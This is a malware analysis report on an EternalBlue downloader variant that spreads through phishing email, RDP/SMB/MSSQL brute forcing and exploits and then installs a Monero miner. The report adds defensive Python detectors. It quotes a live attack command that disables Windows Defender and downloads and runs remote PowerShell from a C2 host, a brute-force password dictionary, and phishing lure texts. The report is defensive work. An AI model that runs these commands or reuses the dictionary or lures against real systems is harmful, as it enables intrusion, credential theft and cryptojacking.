I. Background

The Tencent Security Threat Intelligence Center recently detected a new variant of the EternalBlue downloader trojan. The variant keeps the email-worm technique of the previous version: it sends phishing emails carrying a .doc file that exploits the Office vulnerability CVE-2017-8570 together with a JS decoy file. It adds code that detects and reports machines vulnerable to SMBGhost (CVE-2020-0796) and code for SSH brute-force attacks, which suggests that later campaigns may exploit SMBGhost and may also attack Linux systems.

When the payload runs it installs randomly named scheduled tasks that download a.jsp from the new C2 addresses t.zer9g.com and t.zz3r0.com for persistence. a.jsp in turn downloads the attack modules if.bin and if_mail.bin, which spread worm-style through vulnerability exploitation, brute forcing and phishing email, and injects the XMRig miner programs m6.bin and m6g.bin into PowerShell.exe. The malware also installs a scheduled task named blackball that has no actual function, which is why this campaign is named Operation "Black Ball".

Response list of Tencent Security products for the EternalBlue downloader trojan:

| Product | Response |
| --- | --- |
| | 1) IOCs related to the EternalBlue downloader gang have been added to the database. |
| | 1) Information and intelligence on the EternalBlue downloader gang can be searched. |
| | Network-traffic based threat detection and active blocking: 1) IOCs associated with exploitation of EternalBlue (MS17-010) and SMBGhost (CVE-2020-0796) are detected; 2) access-control rules can be pushed to block the target ports and actively intercept traffic related to MS17-010 and CVE-2020-0796. For more on Cloud Firewall see https://cloud.tencent.com/product/cfw |
| Tencent T-Sec Host Security (Cloud Workload Protection, CWP) | 1) Yunjing detects MS17-010 and CVE-2020-0796; 2) it detects and removes mining trojans and backdoors planted through MS17-010 and CVE-2020-0796. |
| | 1) Tencent Yuzhi monitors whether network-wide assets are affected by MS17-010 and CVE-2020-0796. 2) A non-destructive detection PoC is integrated so that enterprises can remotely check their own assets. |
| | A cloud security operations platform built on customer cloud security data and Tencent Security big data. It ingests data from Tencent Host Security (Yunjing), Tencent Yuzhi and other products and provides vulnerability intelligence, threat discovery, incident handling, baseline compliance, leak monitoring and risk visualization. |
| | Network-traffic based threat detection: 1) IOCs associated with exploitation of MS17-010 and CVE-2020-0796 are detected; 2) protocol signatures of MS17-010 and CVE-2020-0796 exploitation are detected. For more on the T-Sec Advanced Threat Detection system see https://cloud.tencent.com/product/nta |
| | 1) Backdoors and mining trojans dropped by the EternalBlue downloader gang are detected and removed; 2) the enterprise endpoint management system detects network communication related to intrusions through MS17-010 and CVE-2020-0796; 3) the enterprise endpoint management system detects malware exploiting the LNK vulnerability CVE-2017-8464 and the Office vulnerability CVE-2017-8570. |
II. Sample analysis

1. Phishing email attack

The worm first collects mailbox contacts from the running Outlook application session.

It then generates two attachment files, readme.doc and readme.js, and packs readme.js into the archive readme.zip. readme.doc contains trigger code for the Office vulnerability CVE-2017-8570; readme.js contains malicious WScript attack code. Opening either attachment runs a malicious command that downloads http[:]//d.ackng.com/mail.jsp.
In $mail.Body it fills in the subject and body of the outgoing message, chosen at random from nine preset templates. They fall into three groups: "COVID-19", "everyday conversation" and "corrupted file that cannot be viewed". The templates (subject, then body, with the worm's original spelling kept) are:

1. The Truth of COVID-19, "Virus actually comes from United States of America"
2. COVID-19 nCov Special info WHO, "very important infomation for Covid-19 .see attached document for your action and discretion."
3. HALTH ADVISORY:CORONA VIRUS, "the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.see attached document for your action and discretion."
4. WTF, "what's wrong with you?are you out of your mind!!!!!"
5. What the fcuk, "are you out of your mind!!!!!what 's wrong with you?"
6. good bye, "good bye, keep in touch"
7. farewell letter, "good bye, keep in touch"
8. broken file, "can you help me to fix the file,i can't read it"
9. This is your order?, "file is brokened, i can't open it"
An example of a generated phishing email:
Finally, for every contact found in the mailbox, it sends an email carrying the malicious attachments readme.doc and readme.zip.
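The subject templates, attachment names and download host above are enough to write a mail-gateway triage rule. The following Python is an added example written for this page, not code from the report or from the malware: the indicator values come from the text, while the Message records and the block/review/allow thresholds are constructed for illustration. Because subjects such as "WTF" or "good bye" also occur in legitimate mail, the rule only blocks on the exact readme.doc + readme.zip pair, or on a template subject combined with a lure attachment, and sends weaker matches to review.

```python
"""Mail-gateway triage for the phishing wave described above.

Added example, not code from the original report. The nine subject lines,
the attachment names readme.doc / readme.zip / readme.js and the download
host d.ackng.com come from the report; the Message records below are
constructed, and the block/review/allow thresholds are this example's own.
"""
from dataclasses import dataclass, field

# Subject lines exactly as embedded in the worm (typos kept), lower-cased.
KNOWN_SUBJECTS = {
    "the truth of covid-19",
    "covid-19 ncov special info who",
    "halth advisory:corona virus",
    "wtf",
    "what the fcuk",
    "good bye",
    "farewell letter",
    "broken file",
    "this is your order?",
}
LURE_ATTACHMENTS = {"readme.doc", "readme.zip", "readme.js"}
DOWNLOAD_HOST = "d.ackng.com"  # host both attachments fetch mail.jsp from


@dataclass
class Message:
    sender: str
    subject: str
    body: str
    attachments: list = field(default_factory=list)


def triage(msg: Message) -> dict:
    """Return a verdict and the indicators that produced it for one message.

    Generic subjects are not blocked on their own: block only on the exact
    attachment pair, or a template subject plus a lure attachment; anything
    weaker is flagged for analyst review.
    """
    reasons = []
    subject_hit = msg.subject.strip().lower() in KNOWN_SUBJECTS
    if subject_hit:
        reasons.append("subject matches worm template")
    names = {a.lower() for a in msg.attachments}
    lures = sorted(names & LURE_ATTACHMENTS)
    if lures:
        reasons.append("lure attachment: " + ", ".join(lures))
    pair = {"readme.doc", "readme.zip"} <= names
    if pair:
        reasons.append("readme.doc + readme.zip pair")
    if DOWNLOAD_HOST in msg.body.lower():
        reasons.append("body references " + DOWNLOAD_HOST)

    if pair or (subject_hit and lures):
        verdict = "block"
    elif reasons:
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, "reasons": reasons}


# Constructed sample traffic: one worm message, one normal message, one
# message that only shares a generic subject with the worm.
SAMPLE_MESSAGES = [
    Message("alice@example.test", "farewell letter", "good bye, keep in touch",
            ["readme.doc", "readme.zip"]),
    Message("billing@example.test", "Q3 invoice", "Invoice attached.",
            ["invoice-2020-q3.pdf"]),
    Message("bob@example.test", "broken file", "see the shared drive", []),
]


def triage_all(messages=SAMPLE_MESSAGES) -> list:
    """Verdicts for a batch of messages, in input order."""
    return [triage(m)["verdict"] for m in messages]


if __name__ == "__main__":
    for m, verdict in zip(SAMPLE_MESSAGES, triage_all()):
        print(f"{verdict:6} {m.sender:25} {m.subject!r}")
```

Run as a script it prints one verdict per constructed message; `triage()` is the function to call from a real gateway hook, where the attachment names and body are taken from the parsed MIME message.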
2. Weak-password brute forcing

RDP brute forcing (port 3389) uses the username "administrator" and the following password dictionary:

"saadmin","123456","test1","zinch","g_czechout","asdf","Aa123456.","dubsmash","password","PASSWORD","123.com","admin@123","Aa123456","qwer12345","Huawei@123","123@abc","golden","123!@#qwe","1qaz@WSX","Ab123","1qaz!QAZ","Admin123","Administrator","Abc123","Admin@123","999999","Passw0rd","123qwe!@#","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678","123456789","987654321","admin","abc123","abcd1234","abcd@1234","abc@123","p@ssword","P@ssword","p@ssw0rd","P@ssw0rd","P@SSWORD","P@SSW0RD","P@w0rd","P@word","iloveyou","monkey","login","passw0rd","master","hello","qazwsx","password1","Password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator","qwe1234A","qwe1234a","123123123","1234567890","88888888","111111111","112233","a123456","123456a","5201314","1q2w3e4r","qwe123","a123456789","123456789a","dragon","sunshine","princess","!@#$%^&*","charlie","aa123456","homelesspa","1q2w3e4r5t","sa","sasa","sa123","sql2005","sa2008","abc","abcdefg","sapassword","Aa12345678","ABCabc123","sqlpassword","sql2008","11223344","admin888","qwe1234","A123456","OPERADOR","Password123","test123","NULL","user","test","Password01","stagiaire","demo","scan","P@ssw0rd123","xerox","compta"

After a successful login the worm reports the machine's IP address and the password that worked, then uses the rdpexec module to run $rdp_code remotely:

cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershell IEX(New-Object Net.WebClient).DownloadString(''http[:]//t.amynx.com/rdp.jsp'')
SMB brute forcing (port 445) uses the usernames "administrator" and "admin"; after success it remotely executes the command $ipc_code.

MSSQL brute forcing (port 1433) uses the same password dictionary as the RDP attack; after success it remotely executes the command $mscmd_code.

In addition, the latest attack code adds SSH brute-force commands that start an SSH brute-force module and run the remote command $ssh_cmd after a successful login. This function is not yet enabled and is probably still under development; if it is switched on later, infected Windows machines could attack Linux systems through SSH brute forcing.
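Two defensive uses follow directly from the brute-force description above: the quoted dictionary doubles as a password blocklist for account policy, and the attack pattern (one account, many passwords, one source) is visible as a burst of failed logons. The Python below is an added example for this page, not code from the report: ATTACKER_DICTIONARY is a subset of the password list quoted above (the rest can be pasted in), and the logon records are constructed in a simplified Windows Security log style (event 4625 is a failed logon; logon type 10 is RemoteInteractive/RDP, type 3 is network) carrying only the fields the example reads.

```python
"""Weak-password blocklist and RDP brute-force burst detection.

Added example, not code from the report. ATTACKER_DICTIONARY holds a subset
of the password list quoted above; the logon records are constructed in a
simplified Windows Security log style (4625 = failed logon, logon type 10 =
RDP, 3 = network) with only the fields this example reads.
"""
import re
from collections import defaultdict
from datetime import datetime

ATTACKER_DICTIONARY = {
    "saadmin", "123456", "Aa123456.", "password", "123.com", "admin@123",
    "Huawei@123", "1qaz@WSX", "Admin@123", "Passw0rd", "P@ssw0rd",
    "P@ssw0rd123", "qwerty", "1q2w3e4r", "sql2005", "sa2008",
    "Password123", "Password01", "abcd@1234", "admin888",
}


def is_blocklisted(candidate: str) -> bool:
    """Exact match: the worm's list carries its own case variants
    ("password", "PASSWORD", "Passw0rd"), so no case folding is applied."""
    return candidate in ATTACKER_DICTIONARY


EVENT_RE = re.compile(
    r"^(\S+) EventID=(\d+) LogonType=(\d+) Account=(\S+) Source=(\S+)$")


def parse_event(line: str):
    """Parse one constructed log line; return None for lines that do not fit."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ts, eid, ltype, account, src = m.groups()
    return {"time": datetime.fromisoformat(ts), "event_id": int(eid),
            "logon_type": int(ltype), "account": account.lower(), "source": src}


def detect_bursts(lines, threshold=10, window_seconds=60, logon_types=(3, 10)):
    """Return {source: max_failures_in_window} for every source that produced
    at least `threshold` failed RDP/network logons inside one sliding window.

    The worm sprays a long dictionary at "administrator", so the signal is
    many 4625 events from one source in a short time.
    """
    per_source = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev and ev["event_id"] == 4625 and ev["logon_type"] in logon_types:
            per_source[ev["source"]].append(ev["time"])

    flagged = {}
    for src, times in per_source.items():
        times.sort()
        best = j = 0
        for i in range(len(times)):  # two-pointer sliding window
            while (j < len(times)
                   and (times[j] - times[i]).total_seconds() <= window_seconds):
                j += 1
            best = max(best, j - i)
        if best >= threshold:
            flagged[src] = best
    return flagged


# Constructed events: 12 RDP failures in 12 seconds from 10.0.0.5 (a spray
# against "administrator"), one success from the same host, and three
# scattered failures from 10.0.0.9 that stay under the threshold.
SAMPLE_EVENTS = [
    f"2020-06-10T08:00:{s:02d} EventID=4625 LogonType=10 "
    f"Account=administrator Source=10.0.0.5"
    for s in range(12)
] + [
    "2020-06-10T08:00:12 EventID=4624 LogonType=10 Account=administrator Source=10.0.0.5",
    "2020-06-10T08:05:00 EventID=4625 LogonType=10 Account=jsmith Source=10.0.0.9",
    "2020-06-10T08:09:30 EventID=4625 LogonType=10 Account=jsmith Source=10.0.0.9",
    "2020-06-10T08:14:00 EventID=4625 LogonType=10 Account=jsmith Source=10.0.0.9",
]

if __name__ == "__main__":
    print("blocklisted:", is_blocklisted("Huawei@123"))
    print("brute-force sources:", detect_bursts(SAMPLE_EVENTS))
```

The threshold and window are tuning knobs: the worm works through well over a hundred passwords per host, so even a conservative setting such as ten failures per minute catches it while leaving room for a user mistyping a password a few times.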
3. Vulnerability exploitation

The EternalBlue downloader variant also uses publicly available vulnerability check code to find machines affected by SMBGhost (CVE-2020-0796) and reports their IP addresses.

On 12 March 2020 the Tencent Security Threat Intelligence Center published an advisory on the SMBv3 remote code execution vulnerability CVE-2020-0796 (alias SMBGhost, nicknamed "EternalDarkness", 永恒之黑). On 2 June 2020 a foreign security researcher published RCE code for CVE-2020-0796, which the Tencent Security team analyzed and warned about. The consequences of this vulnerability are very close to those of the EternalBlue family: both exploit a Windows SMB flaw remotely to obtain the highest system privileges. Besides direct RCE against the SMB server, an attacker can trigger the flaw through specially crafted web pages, archives, shared directories, Office documents and other vectors. Publication of the exploit source code sharply raised the risk, since criminal groups only need to modify it to use it in network attacks.

EternalBlue exploitation: after a successful attack the worm remotely executes the command $sc_code.

LNK exploitation (CVE-2017-8464): the worm creates LNK files carrying CVE-2017-8464 exploit code on removable drives and network drives; merely viewing such a file executes the malicious code. It also drops the JS file readme.js so that the disguised file infects the machine if it is clicked by mistake.
4. Removing competing mining trojans

In the attack module if.bin, the Killer() function collects detailed information on a large number of competing mining trojans, including the services, scheduled tasks and process names they install, as well as the command-line and port characteristics of their mining, in order to identify and remove them.

Matching by service name:
$SrvName ="xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks"

Matching by scheduled task name:
$TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore"

Matching by command-line characteristics:
$_.CommandLine -like '*pool.monero.hashvault.pro*' -Or $_.CommandLine -like '*blazepool*' -Or $_.CommandLine -like '*blockmasters*' -Or $_.CommandLine -like '*blockmasterscoins*' -Or $_.CommandLine -like '*bohemianpool*' -Or $_.CommandLine -like '*cryptmonero*' -Or $_.CommandLine -like '*cryptonight*' -Or $_.CommandLine -like '*crypto-pool*' -Or $_.CommandLine -like '*--donate-level*' -Or $_.CommandLine -like '*dwarfpool*' -Or $_.CommandLine -like '*hashrefinery*' -Or $_.CommandLine -like '*hashvault.pro*' -Or $_.CommandLine -like '*iwanttoearn.money*' -Or $_.CommandLine -like '*--max-cpu-usage*' -Or $_.CommandLine -like '*mine.bz*' -Or $_.CommandLine -like '*minercircle.com*' -Or $_.CommandLine -like '*minergate*' -Or $_.CommandLine -like '*miners.pro*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*minexmr*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*miningpoolhubcoins*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero.lindon-pool.win*' -Or $_.CommandLine -like '*moriaxmr.com*' -Or $_.CommandLine -like '*mypool.online*' -Or $_.CommandLine -like '*nanopool.org*' -Or $_.CommandLine -like '*nicehash*' -Or $_.CommandLine -like '*-p x*' -Or $_.CommandLine -like '*pool.electroneum.hashvault.pro*' -Or $_.CommandLine -like '*pool.xmr*' -Or $_.CommandLine -like '*poolto.be*' -Or $_.CommandLine -like '*prohash*' -Or $_.CommandLine -like '*prohash.net*' -Or $_.CommandLine -like '*ratchetmining.com*' -Or $_.CommandLine -like '*slushpool*' -Or $_.CommandLine -like '*stratum+*' -Or $_.CommandLine -like '*suprnova.cc*' -Or $_.CommandLine -like '*teracycle.net*' -Or $_.CommandLine -like '*usxmrpool*' -Or $_.CommandLine -like '*viaxmr.com*' -Or $_.CommandLine -like '*xmrpool*' -Or $_.CommandLine -like '*yiimp*' -Or $_.CommandLine -like '*zergpool*' -Or $_.CommandLine -like '*zergpoolcoins*' -Or $_.CommandLine -like '*zpool*'

Matching by network port:
($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":1111") -or $t.contains(":2222") -or $t.contains(":3333") -or $t.contains(":4444") -or $t.contains(":5555") -or $t.contains(":6666") -or $t.contains(":7777") -or $t.contains(":8888") -or $t.contains(":9999") -or $t.contains(":14433") -or $t.contains(":14444") -or $t.contains(":45560") -or $t.contains(":65333"))

Matching by process name:
$Miner ="SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost", "SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores"
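The indicator classes the Killer() function uses (process name wildcards, command-line substrings, service and task names, and ESTABLISHED connections to common pool ports) are just as useful to a defender hunting for miners, with two caveats the worm itself ignores: its lists contain generic names such as "update", "service" or "win" that would flood an analyst with false positives, and its port test would miss this very worm's pool, lplp.ackng.com:443. The Python below is an added example for this page, not code from the report or the malware. It reimplements the worm's PowerShell `-like` test with `fnmatch` and parses `netstat -ano` style rows by field rather than by substring; the pattern sets are a distinctive subset of the lists quoted above, and the process table, netstat output, service and task names are constructed.

```python
"""Hunt for mining activity with the indicator classes the worm's Killer()
function uses: process names, command-line substrings, service and task
names, and ESTABLISHED connections to common pool ports.

Added example, not code from the report. Pattern sets are a distinctive
subset of the lists quoted above; the host snapshot below is constructed.
"""
import fnmatch
import re


def like(value: str, pattern: str) -> bool:
    """PowerShell -like semantics as used in the worm: case-insensitive,
    with '*' and '?' wildcards."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


CMDLINE_PATTERNS = [
    "*pool.monero.hashvault.pro*", "*cryptonight*", "*--donate-level*",
    "*--max-cpu-usage*", "*stratum+*", "*nicehash*", "*xmrpool*",
    "*nanopool.org*", "*minexmr*", "*-p x*",
]
PROCESS_PATTERNS = ["XMR*", "xmrig*", "minerd", "MinerGate", "WindowsUpdater*",
                    "svshost", "xig*", "taskmgr1"]
SERVICE_NAMES = {"xWinWpdSrv", "Oracleupdate", "WmdnPnSN", "mssecsvc2.0",
                 "WWW.DDOS.CN.COM", "WinVaultSvc"}
TASK_NAMES = {"Mysa", "Mysa1", "Oracle Java Update", "LimeRAT-Admin", "ECDnsCore"}
# Ports from the worm's netstat test. This worm's own pool (lplp.ackng.com)
# listens on 443, which a port-only heuristic misses.
MINER_PORTS = {1111, 2222, 3333, 4444, 5555, 6666, 7777, 8888, 9999,
               14433, 14444, 45560, 65333}

# Windows `netstat -ano` row: proto, local, remote, state, PID.
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")


def established_pool_ports(netstat_lines) -> dict:
    """Map PID -> remote pool ports over ESTABLISHED connections. Mirrors the
    worm's contains("ESTABLISHED") -and contains(":3333") test, but checks the
    remote port field instead of any ":3333" substring in the row."""
    hits = {}
    for line in netstat_lines:
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        _, _, _, rport, state, pid = m.groups()
        if state == "ESTABLISHED" and int(rport) in MINER_PORTS:
            hits.setdefault(int(pid), set()).add(int(rport))
    return hits


def hunt(processes, netstat_lines, services=(), tasks=()) -> list:
    """Return (subject, name, reasons) triples for everything that matches."""
    findings = []
    ports = established_pool_ports(netstat_lines)
    for p in processes:
        reasons = []
        if any(like(p["name"], pat) for pat in PROCESS_PATTERNS):
            reasons.append("process name")
        if any(like(p["cmdline"], pat) for pat in CMDLINE_PATTERNS):
            reasons.append("command line")
        if p["pid"] in ports:
            reasons.append("pool port " + ",".join(map(str, sorted(ports[p["pid"]]))))
        if reasons:
            findings.append((p["pid"], p["name"], reasons))
    findings += [("service", s, ["known miner service name"])
                 for s in services if s in SERVICE_NAMES]
    findings += [("task", t, ["known miner task name"])
                 for t in tasks if t in TASK_NAMES]
    return findings


# Constructed host snapshot: one miner, one normal service host, one
# PowerShell process talking to port 443 that the port test cannot see.
PROCESSES = [
    {"pid": 4120, "name": "xmrig.exe",
     "cmdline": "xmrig.exe -o stratum+tcp://pool.example.test:3333 -u 4Awallet -p x --donate-level 1"},
    {"pid": 812, "name": "svchost.exe", "cmdline": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    {"pid": 2044, "name": "powershell.exe", "cmdline": "powershell -w hidden -NoP -ep bypass"},
]
NETSTAT = [
    "  TCP    10.0.0.7:49812     198.51.100.20:3333     ESTABLISHED     4120",
    "  TCP    10.0.0.7:49813     198.51.100.21:443      ESTABLISHED     2044",
    "  TCP    0.0.0.0:135        0.0.0.0:0              LISTENING       812",
]
SERVICES = ["wuauserv", "Oracleupdate"]
TASKS = ["GoogleUpdateTaskMachine", "Mysa1"]

if __name__ == "__main__":
    for subject, name, reasons in hunt(PROCESSES, NETSTAT, SERVICES, TASKS):
        print(subject, name, "->", "; ".join(reasons))
```

The PID 2044 process in the constructed snapshot is deliberately left unflagged: a miner injected into PowerShell.exe and talking to a pool on 443, as this worm does, shows up only through CPU usage or the pool hostname in DNS and proxy logs, not through the Killer()-style heuristics.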
5. Payload execution

After brute forcing, RCE exploitation or the phishing email, the worm downloads and executes the PowerShell code at http[:]//t.amynx.com/mail.jsp or http[:]//t.amynx.com/usb.jsp.

mail.jsp updates the C2 addresses to t.amynx.com, t.zer9g.com and t.zz3r0.com and installs the scheduled task blackball, which executes no actual code. mail.jsp then installs three randomly named scheduled tasks (<random>, <random>\<random> and MicroSoft\Windows\<random>) whose command is the placeholder "PS_CMD". The "PS_CMD" placeholder in the three tasks is then replaced with commands that download and execute the PowerShell code at http[:]//t.awcna.com/a.jsp, http[:]//t.zer9g.com/a.jsp and http[:]//t.zz3r0.com/a.jsp, giving the attack persistence.

a.jsp downloads the attack module if.bin, which carries out the exploitation and weak-password brute forcing. It also downloads the Monero mining modules m6.bin and m6g.bin and uses Invoke-ReflectivePEInjection to inject the XMR mining trojan into PowerShell.exe; the miner connects to the pool lplp.ackng.com:443 and drives CPU usage close to 100%.

It sets the ObjectModelGuard value under the Outlook registry key "*\Outlook\Security" to 2, so that Outlook no longer prompts on any suspicious activity.

It then downloads and executes the PowerShell email worm http[:]//d.ackng.com/if_mail.bin, which collects all mailbox contacts and sends phishing emails to each of them, starting the next round of the attack.
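The persistence and tampering steps above leave artefacts that can be checked directly on a host: the decoy task name blackball, tasks whose action is an `IEX(New-Object Net.WebClient).DownloadString` cradle fetching a.jsp from one of the C2 hosts (or still holding the "PS_CMD" placeholder), the Set-MpPreference/Add-MpPreference commands from $rdp_code, and ObjectModelGuard set to 2 under an Outlook\Security key. The Python below is an added example for this page, not code from the report or the malware. It parses exported Task Scheduler XML (the schema namespace is Microsoft's real one) and applies those indicators; the task XML documents, the command-line log and the registry entries are constructed, and the blackball task's action is a placeholder because the report only says the task does nothing.

```python
"""Hunt for the persistence and tampering artefacts described above.

Added example, not code from the report. Indicator values (task name
blackball, the C2 hosts, a.jsp, the Set-MpPreference/Add-MpPreference
commands, ObjectModelGuard = 2, the PS_CMD placeholder) come from the
report; the task XML, command log and registry entries are constructed.
"""
import re
import xml.etree.ElementTree as ET

# Task Scheduler task-definition XML namespace.
NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
C2_HOSTS = {"t.amynx.com", "t.zer9g.com", "t.zz3r0.com", "t.awcna.com", "d.ackng.com"}
CRADLE_RE = re.compile(r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString", re.I)
TAMPER_RE = re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+(1|\$true)"
                       r"|Add-MpPreference\s+-ExclusionProcess", re.I)


def inspect_command(cmd: str) -> list:
    """Indicators present in one command line (task action or process)."""
    reasons = []
    low = cmd.lower()
    if CRADLE_RE.search(cmd):
        reasons.append("download cradle")
    hosts = sorted(h for h in C2_HOSTS if h in low)
    if hosts:
        reasons.append("known C2 host: " + ", ".join(hosts))
    if re.search(r"/a\.jsp\b", low):
        reasons.append("fetches a.jsp")
    if TAMPER_RE.search(cmd):
        reasons.append("Defender tampering")
    if cmd.strip() == "PS_CMD":
        reasons.append("unreplaced PS_CMD placeholder")
    return reasons


def analyze_task(task_xml: str) -> dict:
    """Parse an exported scheduled-task definition and score its name and actions."""
    root = ET.fromstring(task_xml)
    uri = root.findtext(f"{NS}RegistrationInfo/{NS}URI", default="")
    reasons = []
    if uri.rsplit("\\", 1)[-1].lower() == "blackball":
        reasons.append("decoy task name blackball")
    for ex in root.iter(f"{NS}Exec"):
        cmd = (ex.findtext(f"{NS}Command", default="") + " " +
               ex.findtext(f"{NS}Arguments", default="")).strip()
        reasons += inspect_command(cmd)
    return {"uri": uri, "reasons": reasons}


def check_registry(entries) -> list:
    """Keys where ObjectModelGuard is 2 under any ...\\Outlook\\Security
    (the worm writes "*\\Outlook\\Security", i.e. every Office version)."""
    return [key for key, name, data in entries
            if key.lower().endswith(r"\outlook\security")
            and name.lower() == "objectmodelguard" and data == 2]


def check_commands(lines) -> list:
    """(command, reasons) pairs for process command lines carrying indicators."""
    return [(line, inspect_command(line)) for line in lines if inspect_command(line)]


# Constructed task exports (XML declaration omitted so ET.fromstring takes str).
BLACKBALL_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\blackball</URI></RegistrationInfo>
  <Actions Context="Author"><Exec><Command>cmd</Command><Arguments>/c exit</Arguments></Exec></Actions>
</Task>"""
PERSIST_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Rtsa2</URI></RegistrationInfo>
  <Actions Context="Author"><Exec><Command>powershell</Command>
  <Arguments>-w hidden -c IEX(New-Object Net.WebClient).DownloadString('http[:]//t.zer9g.com/a.jsp')</Arguments>
  </Exec></Actions>
</Task>"""
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI></RegistrationInfo>
  <Actions Context="Author"><Exec><Command>%windir%\\system32\\defrag.exe</Command>
  <Arguments>-c -h -o -$</Arguments></Exec></Actions>
</Task>"""
COMMAND_LOG = [
    r"cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference "
    r"-ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe",
    "powershell IEX(New-Object Net.WebClient).DownloadString('http[:]//t.amynx.com/rdp.jsp')",
    r"powershell -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1",
]
REGISTRY = [  # constructed (key, value name, data) triples
    (r"HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security", "ObjectModelGuard", 2),
    (r"HKCU\Software\Microsoft\Office\16.0\Outlook\Preferences", "ReadAsPlain", 1),
]

if __name__ == "__main__":
    for xml_doc in (BLACKBALL_TASK, PERSIST_TASK, BENIGN_TASK):
        print(analyze_task(xml_doc))
    print(check_commands(COMMAND_LOG))
    print(check_registry(REGISTRY))
```

On a live host the task XML comes from `schtasks /query /xml` or the files under `%SystemRoot%\System32\Tasks`, and the command lines from process-creation telemetry; the point of `inspect_command` being shared is that the same indicators catch the cradle whether it sits in a task action or in a running process.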
6. Version history

According to continuous tracking by the Tencent Security Threat Intelligence Center, the EternalBlue downloader changed as follows between 2018 and 2020:
III. IOCs

Domains:
t.amynx.com
t.zer9g.com
t.zz3r0.com
d.ackng.com

URLs:
http[:]//d.ackng.com/if_mail.bin
http[:]//d.ackng.com/if.bin
http[:]//t.zer9g.com/a.jsp
http[:]//t.zz3r0.com/a.jsp
http[:]//t.amynx.com/mail.jsp

MD5:
if.bin e5ae6d154a6befc00deea0ccb49dc9b8
if_mail.bin 88949e6a329c6b2796ddcc81564cee1a
a.jsp e3687c56b8be535398051405f8221d82
usb.jsp 7805776504e8a39c2a892d89e2492c12
mail.jsp cc67b69740c7bd0744acd3242729ce15

References:
"Greetings from 'Blue Tea': 'Are you out of your mind', a new attack technique in hiding" (来自“蓝茶”的问候:“你是不是疯了”,暗藏新攻击手法)
